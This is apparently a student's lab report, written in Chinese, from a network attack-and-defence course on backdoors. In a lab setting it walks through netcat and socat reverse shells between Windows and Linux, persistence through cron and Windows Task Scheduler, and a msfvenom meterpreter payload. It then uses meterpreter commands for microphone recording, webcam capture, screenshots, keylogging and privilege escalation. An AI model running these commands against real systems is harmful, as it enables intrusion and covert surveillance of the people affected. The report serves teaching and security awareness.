网络对抗 Exp2.1 后门原理与实践 20154311 王卓然

Exp2后门原理与实践

一、实践目标与内容

学习内容使用nc实现win,mac,Linux间的后门连接
       meterpreter的应用
       MSF POST 模块的应用
学习目标建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。


二、后门概念

后门就是不经过正常认证流程而访问系统的通道。(我们常说的木马基本都属于后门)。

  • 编译器留后门(则用该编译器编写出来的软件基本都存在后门)。
  • 操作系统留后门
  • 最常见的当然还是应用程序中留后门
  • 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。

三、实验步骤

 1、Windows获得Linux Shell

 先用 ipconfig 查看windows的IP地址

win+r 输入 cmd 打开命令提示符用 cd 命令转到 ncat 文件目录,输入 ncat.exe -l -p 4311 监听端口4311。

在Linux输入 nc 192.168.1.185 4311 -e /bin/sh 反弹连接windows的4311端口。

windows下获得一个linux shell,可运行任何指令,如ls。

2、Linux获得Windows Shell

      先用 ifconfig 查看Linux的IP地址

Linux监听端口4311

windows反弹连接Linux

Linux下看到Windows的命令提示,并且可以正常使用wIndows命令,例如ipconfig,只是由于进制显示问题,会出现乱码。

3、使用nc传输数据

windows监听端口4311,Linux反弹连接,连接建立成功后即可进行字符串传输。

4、以定时任务cron的形式启动netcat获取主机操作Shell

在windows端监听端口4311

在Linux端输入 crontab -e 命令建立一项定时任务(有不太懂的可以通过man crontab指令查看具体说明),如果是第一次使用会要求你选择编辑器,可以选择 vim basic 那一项。

打开后在最后一行添加代码 10 * * * *  /bin/netcat 192.168.1.185 4311 -e /bin/sh 保存退出,则在每个小时10分时会自动运行,反弹连接windows的4311端口。(可以通过 crontab -l 来查看,"-l"表示list)。

5、使用socat获取主机操作Shell, 任务计划启动

按 win+i 依次打开控制面板->系统和安全->管理工具->任务计划,新建一个任务,自命名。

 

新建触发器设定开始任务为“工作站锁定时”。

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4311 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口4311,同时把cmd.exe的stderr重定向到stdout上:

创建完成后,选中该任务在右侧点击运行。

然后,在Linux下输入指令 socat - tcp:192.168.1.185:4311 ,这里的第一个参数 代表标准的输入输出,第二个流连接到Windows主机的4311端口,此时可以发现已经成功获得了一个win shell:

6、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.199 LPORT=4311 -f exe > 20154311_backdoor.exe 生成后门程序

在windows上使用ncat指令建立端口4311

在Linux上通过nc指令传输生成的后门文件20154311_backdoor.exe

则在ncat文件目录下可以接收到Linux发送的后门文件(更简单点的方法可以直接在Linux内复制文件粘贴到windows系统下)

在Linux上使用 msfconsle 指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口

 

设置完成后,执行监听指令 exploit 。

打开windows上的后门程序20154311_backdoor.exe。

此时Linux已经获得了windows主机的连接,并且得到了远程控制的shell。

执行 record_mic 指令录制一段音频。

使用 webcam_snap 指令可以使用摄像头进行拍照。

执行 screenshot 指令可以进行截屏。

执行 keyscan_start 指令开始记录下击键的过程,执行 keyscan_dump 指令读取击键的记录。

执行 getuid 指令查看当前用户,执行 getsystem 指令进行提权(但不知为何我的有点问题)。

四、问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?

  • 最普遍的应该是下载了携带后门代码、后门程序的文件,其次是点开别人发的不明链接。

2.例举你知道的后门如何启动起来(win及linux)的方式?

  • 携带后门代码或后门程序的文件在启动时运行到满足特定的条件会自动启动后门代码或程序,其次是定时启动,Linux可以通过设置cron定时启动后门,windows可以通过设置一个任务计划来启动。

3.Meterpreter有哪些给你映像深刻的功能?

  • 老师说它是大部分后门模块的一个集合体,它的msfvenom指令可以编写可执行的后门程序,甚至可以设置反弹回连的IP、回连的端口和文件的类型,在通过nc传输后可以实现后门的功能。还有就是它的help语句,可以查看各种命令以及相应的用途。最让我震惊的就是还能进行录音、摄像,以后我一定要把摄像头盖住了。

4.如何发现自己有系统有没有被安装后门?

  • 最简单的应该就是通过杀毒软件来检测是否被安装后门,其次我觉得可以通过抓包查看网络连接的部分异常数据块。

五、实验心得与体会

          原本一直以为传说中黑客黑进别人电脑都是十分高超,难以简单把握的技巧,需要长时间的浸淫计算机才能做到。通过这次实验,我才知道原来这类技巧,说简单不简单,但说难也不是特别难,虽然我们的实验环境是在关闭杀毒软件和防火墙的状态下进行的,但是杀毒软件也并非那么的全面全能,所以我们平时应该更加注重自身计算机信息安全方面的防护,不要轻易下载非安全认证的软件,浏览不安全的网站,点开陌生人发送的链接,应该更加注重自身的信息保护措施,这是我们DKY人员的基本素养。

 

posted @ 2018-03-29 15:29  20154311王卓然  阅读(261)  评论(0编辑  收藏  举报